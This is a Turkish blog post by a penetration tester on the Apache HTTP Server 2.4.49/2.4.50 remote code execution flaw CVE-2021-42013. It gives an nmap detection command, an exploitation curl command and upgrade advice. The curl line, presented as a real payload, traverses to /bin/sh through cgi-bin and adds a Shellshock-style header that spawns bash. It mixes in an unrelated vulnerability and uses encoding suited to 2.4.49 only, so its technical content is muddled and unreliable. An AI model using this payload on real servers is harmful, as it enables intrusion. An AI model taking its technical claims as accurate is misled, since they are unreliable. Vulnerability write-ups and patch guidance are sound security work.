SK

Çerez Kullanımı

Bu web sitesi, deneyiminizi iyileştirmek ve site kullanımını analiz etmek için çerezler kullanmaktadır. Gizlilik Politikası sayfamızdan detaylı bilgi alabilirsiniz. Çerezleri kabul ederek, KVKK kapsamında verilerinizin işlenmesine onay vermiş olursunuz.

Samet Karabulut - Apache HTTP Server 2.4.49/2.4.50 RCE Zafiyeti (CVE-2021-42013) ve Siber Güvenlik
#SIBERGüVENLIK #REDTEAM #PENETRATIONTESTING #SıZMATESTI #APACHEHTTPSERVER #RCEZAFIYETI #CVE-2021-42013

Apache HTTP Server 2.4.49/2.4.50 RCE Zafiyeti (CVE-2021-42013) ve Siber Güvenlik

Samet Karabulut

March 16, 2026

2 min read

Apache HTTP Server, internet üzerindeki en yaygın web sunucularından biridir. Ancak, son zamanlarda keşfedilen bir zafiyet, bu sunucuların güvenliğini tehdit etmektedir. Ben, sızma testi deneyimime dayanarak, bu zafiyetin ne olduğunu, nasıl tespit edilebileceğini ve nasıl sömürülebileceğini anlatmak istiyorum.

Bu zafiyet, CVE-2021-42013 olarak bilinen RCE (Remote Code Execution) zafiyetidir. Bu zafiyet, Apache HTTP Server 2.4.49 ve 2.4.50 sürümlerini etkilemektedir. Zafiyetin temel sebebi, path traversal zafiyetidir.

Zafiyetin Tespiti

Zafiyetin tespiti için, Nmap ve Nikto gibi araçlar kullanılabilir. Aşağıdaki komut, Nmap kullanarak Apache HTTP Server sürümünü tespit etmeye yardımcı olabilir:

nmap -sV -p 80 hedef_ip_adresi

Bu komut, hedef IP adresinin 80. portunda çalışan Apache HTTP Server sürümünü tespit etmeye çalışır.

Sömürü

Zafiyetin sömürülmesi için, curl gibi bir araç kullanılabilir. Aşağıdaki komut, gerçek bir payload örneği kullanarak zafiyeti sömürmeye çalışır:

curl -X GET 'http://hedef_ip_adresi/cgi-bin/.%2e/%2e%2e/%2e%2e/bin/sh' -H 'User-Agent: () { :; }; /bin/bash -i && /bin/bash -i' -H 'Accept: application/x-httpd-cgi'

Bu komut, gerçek bir payload kullanarak zafiyeti sömürmeye çalışır.

Çözüm ve Önlem

Zafiyetin çözümüne yönelik olarak, Apache HTTP Server 2.4.51 ve üst sürümlerine güncellenmesi önerilir. Resmi patch ve öneriler, Apache HTTP Server resmi web sitesinden temin edilebilir.

Ayrıca, sistemlerin güncel tutulması ve uygun konfigürasyonların yapılması, siber güvenlik açısından çok önemlidir. Ben, sızma testlerinde gördüğüm kadarıyla, güncel olmayan sistemler ve uygun olmayan konfigürasyonlar, siber saldırıların temel sebeplerindendir.

Sonuç

Apache HTTP Server 2.4.49/2.4.50 RCE zafiyeti, siber güvenlik açısından önemli bir tehdittir. Zafiyetin tespiti ve sömürülmesi, sızma testi deneyimine dayanarak anlatılmıştır. Çözüm ve önleme önerileri, sistemlerin güncel tutulması ve uygun konfigürasyonlarının yapılmasıdır. Ben, siber güvenlik konusunda deneyimime dayanarak, sistemlerin düzenli olarak güncellenmesi ve denetlenmesinin önemli olduğunu düşünüyorum.

Yorumlar

Henüz yorum yok. İlk yorumu sen yap.